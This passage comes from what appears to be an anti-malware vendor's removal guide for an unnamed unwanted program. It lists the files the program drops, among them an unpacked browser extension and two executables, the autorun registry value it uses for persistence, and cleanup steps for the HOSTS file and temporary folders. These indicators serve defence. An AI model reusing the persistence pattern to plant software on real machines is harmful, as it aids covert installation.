    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\lt\messages.json (609 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\da\messages.json (531 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\nl\messages.json (499 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\topbar_floating_button_hover.png (160 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\en_GB\messages.json (474 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\icon_16.png (531 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\ro\messages.json (597 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\fr\messages.json (597 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\flapper.gif (5224 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\icon_128.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\it\messages.json (487 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\sv\messages.json (554 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\topbar_floating_button.png (160 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\pt_PT\messages.json (566 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\hu\messages.json (667 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\ja\messages.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\uk\messages.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\ko\messages.json (763 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\ru\messages.json (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\pl\messages.json (603 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\zh_CN\messages.json (641 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SHKE86ZM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\INTYDBJO\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SDJ7K3RV\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GV4HH7PU\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\iis.exe (2721720 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmpffplug.zip (768 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\ICNS100.exe (77149 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "ICNS" = "%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\ICNS100.exe"

  5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
    127.0.0.1 localhost
  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now